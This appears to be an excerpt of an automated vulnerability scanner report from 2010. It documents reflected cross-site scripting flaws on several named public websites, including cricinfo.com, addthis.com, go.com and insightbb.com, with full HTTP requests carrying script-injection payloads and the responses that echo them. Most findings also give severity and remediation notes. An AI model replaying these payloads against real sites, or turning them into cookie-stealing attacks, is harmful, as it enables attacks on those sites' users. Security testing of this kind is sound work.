GET /member_mgmt/content/submit/member_mgmt/user_registration.html?e4e3a"><script>alert(1)</script>f099b4e3b36=1 HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:18:36 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148438 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:18:36 ...[SNIP]... <input type="hidden" name="referer" value="/member_mgmt/content/submit/member_mgmt/user_registration.html?e4e3a"><script>alert(1)</script>f099b4e3b36=1"> ...[SNIP]...
The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b6a6"><script>alert(1)</script>dbf3b9311b was submitted in the sc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html?sc=masthead9b6a6"><script>alert(1)</script>dbf3b9311b HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:04 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148538 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:17:04 ...[SNIP]... <input type="hidden" name="SourceCategory" value="masthead9b6a6"><script>alert(1)</script>dbf3b9311b"> ...[SNIP]...
The value of the remember request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517ee"><script>alert(1)</script>3bb15ef92c9 was submitted in the remember parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /member_mgmt/content/submit/member_mgmt/user_screenname.html?remember=517ee"><script>alert(1)</script>3bb15ef92c9 HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:16:53 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 11715 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:16:53 ...[SNIP]... <input type="hidden" name="remember" id="WelcomeScrName" value="517ee"><script>alert(1)</script>3bb15ef92c9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33249<script>alert(1)</script>91aac71b8a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /capmon33249<script>alert(1)</script>91aac71b8a3/GetDE HTTP/1.1 Host: tredir.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response
HTTP/1.1 404 Not Found Connection: Close Content-Length: 134 Content-Type: text/html; charset=iso-8859-1 Server: Barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/capmon33249<script>alert(1)</script>91aac71b8a3/GetDE</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52f38<script>alert(1)</script>9f1036eb171 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /capmon/GetDE52f38<script>alert(1)</script>9f1036eb171 HTTP/1.1 Host: tredir.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response
HTTP/1.1 404 Not Found Connection: Close Content-Length: 134 Content-Type: text/html; charset=iso-8859-1 Server: Barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/capmon/GetDE52f38<script>alert(1)</script>9f1036eb171</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 27b93<img%20src%3da%20onerror%3dalert(1)>de2cba9602e was submitted in the REST URL parameter 2. This input was echoed as 27b93<img src=a onerror=alert(1)>de2cba9602e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /help/converting+mssql+mysql27b93<img%20src%3da%20onerror%3dalert(1)>de2cba9602e/ HTTP/1.1 Host: us.generation-nt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:41:13 GMT Server: Apache Set-Cookie: PHPSESSID=90fbf2d190c4da3595af171eaa54a551; expires=Mon, 08 Nov 2010 00:41:13 GMT; path=/ Expires: Sun, 07 Nov 2010 00:41:13 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Sun, 07 Nov 2010 00:41:13 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31525
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71a0f'%3b48a4cb73200 was submitted in the REST URL parameter 4. This input was echoed as 71a0f';48a4cb73200 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CNT/iview/262688115/direct71a0f'%3b48a4cb73200 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7100 Content-Type: text/html Expires: 0 Connection: close Date: Sat, 06 Nov 2010 17:26:13 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 741ca'%3bd720ed68176 was submitted in the REST URL parameter 4. This input was echoed as 741ca';d720ed68176 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /DEN/iview/252677534/direct741ca'%3bd720ed68176/078115 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1289020824-462365; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6329 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 07 Nov 2010 00:42:16 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e42e'%3be35830756e2 was submitted in the REST URL parameter 4. This input was echoed as 6e42e';e35830756e2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /DEN/iview/254478378/direct6e42e'%3be35830756e2 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1289009670-12378696; MUID=7C64E36835CB42C490BB034C0AD431C9;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6351 Content-Type: text/html Expires: 0 Connection: close Date: Sat, 06 Nov 2010 13:23:27 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecc24'%3bac3ed86a775 was submitted in the REST URL parameter 4. This input was echoed as ecc24';ac3ed86a775 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ULA/iview/265979671/directecc24'%3bac3ed86a775 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1289020824-462365; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6253 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 07 Nov 2010 00:43:42 GMT Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efdc8"-alert(1)-"cb9f4d6ef72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.phpefdc8"-alert(1)-"cb9f4d6ef72 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 06 Nov 2010 17:30:30 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=dmj8vhf7t1i7jq7clkt9jii6j5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.phpefdc8"-alert(1)-"cb9f4d6ef72"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f03a6<script>alert(1)</script>0576009f73d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.phpf03a6<script>alert(1)</script>0576009f73d HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 06 Nov 2010 17:30:30 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=e2vtlmnr1a9rli5mbavo6f0t60; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.phpf03a6<script>alert(1)</script>0576009f73d</strong> ...[SNIP]...
5.152. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66c63"-alert(1)-"f4525469f14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/66c63"-alert(1)-"f4525469f14 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 17:29:58 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 86592
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/66c63"-alert(1)-"f4525469f14"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
5.153. http://www.cricinfo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cricinfo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e51e2"><script>alert(1)</script>8865afff4f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e51e2"><script>alert(1)</script>8865afff4f6=1 HTTP/1.1 Host: www.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=60 Content-Type: text/html; charset=UTF-8 X-Varnish: 711005270 X-Varnish-Cache: MISS X-Varnish: 894769522 Date: Sat, 06 Nov 2010 17:30:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 157965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: wci031, country: us, cluster: usa, created: 2010-11-06 17:30:27 ...[SNIP]... <div class="stryEnlarge sectionImgEn" style="padding:0;margin:0 0 0 5px;" onClick="clickMap('index','homepage',null,this,s_omni.prop4,'/ci/content/current/site/index.html?e51e2"><script>alert(1)</script>8865afff4f6=1')"> ...[SNIP]...
5.154. http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fcad"><script>alert(1)</script>7b256488062 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /australia-v-sri-lanka-2010/content/story/485657.html?5fcad"><script>alert(1)</script>7b256488062=1 HTTP/1.1 Host: www.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=300 Content-Type: text/html; charset=UTF-8 X-Varnish: 708574769 X-Varnish-Cache: MISS X-Varnish: 891736454 Date: Sat, 06 Nov 2010 14:03:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 145607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: wci034, country: us, cluster: usa, created: 2010-11-06 14:03:26 ...[SNIP]... <a href="/australia-v-sri-lanka-2010/content/story/485657.html?5fcad"><script>alert(1)</script>7b256488062=1;wrappertype=print" id="printIcon" alt="Print" title="Print"> ...[SNIP]...
5.155. http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485685.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7798c"><script>alert(1)</script>fb43bde1b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /australia-v-sri-lanka-2010/content/story/485685.html?7798c"><script>alert(1)</script>fb43bde1b13=1 HTTP/1.1 Host: www.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=300 Content-Type: text/html; charset=UTF-8 X-Varnish: 708563898 X-Varnish-Cache: MISS X-Varnish: 891722930 Date: Sat, 06 Nov 2010 14:02:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 151047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: wci030, country: us, cluster: usa, created: 2010-11-06 14:02:35 ...[SNIP]... <a href="/australia-v-sri-lanka-2010/content/story/485685.html?7798c"><script>alert(1)</script>fb43bde1b13=1;wrappertype=print" id="printIcon" alt="Print" title="Print"> ...[SNIP]...
5.156. http://www.cricinfo.com/pakistan-v-south-africa-2010/content/story/485578.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2be18"><script>alert(1)</script>a66a096602c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pakistan-v-south-africa-2010/content/story/485578.html?2be18"><script>alert(1)</script>a66a096602c=1 HTTP/1.1 Host: www.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=300 Content-Type: text/html; charset=UTF-8 X-Varnish: 708580736 X-Varnish-Cache: MISS X-Varnish: 891743888 Date: Sat, 06 Nov 2010 14:03:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 155901
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: wci029, country: us, cluster: usa, created: 2010-11-06 14:03:54 ...[SNIP]... <a href="/pakistan-v-south-africa-2010/content/story/485578.html?2be18"><script>alert(1)</script>a66a096602c=1;wrappertype=print" id="printIcon" alt="Print" title="Print"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b38eb'%3b63f855f76c5 was submitted in the REST URL parameter 1. This input was echoed as b38eb';63f855f76c5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Authb38eb'%3b63f855f76c5/Authpartners.aspx HTTP/1.1 Host: www.insightbb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=d1itev550ydlno3nt5cql555; path=/; HttpOnly X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 06 Nov 2010 14:13:22 GMT Connection: close Content-Length: 46047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51194'%3bf833bbb8ea9 was submitted in the REST URL parameter 2. This input was echoed as 51194';f833bbb8ea9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Auth/Authpartners.aspx51194'%3bf833bbb8ea9 HTTP/1.1 Host: www.insightbb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=315cwg55bvxbbj45wbf33xm2; path=/; HttpOnly X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 06 Nov 2010 14:13:33 GMT Connection: close Content-Length: 45960
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<HTML> <HEAD> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" > <title>Insight Broadband</title> <script type ...[SNIP]... r") { if(event.srcElement.name == "txtZip"){ if (event.keyCode==13) { IsLocalZipValid('frmZip','/error404.aspx?404;http://www.insightbb.com:80/Auth/Authpartners.aspx51194';f833bbb8ea9'); } } }else{ if (e.target.name == "txtZip"){ if (e.keyCode==13) { IsLocalZipValid('frmZip','/error404.aspx?404;http://www.insightbb.com:80/Auth/A ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 296e5"><script>alert(1)</script>e5a735cc086 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a22ce"><script>alert(1)</script>99653f53917 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ci/content/submit/comment/usr_login.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us; Referer: http://www.google.com/search?hl=en&q=a22ce"><script>alert(1)</script>99653f53917
Response
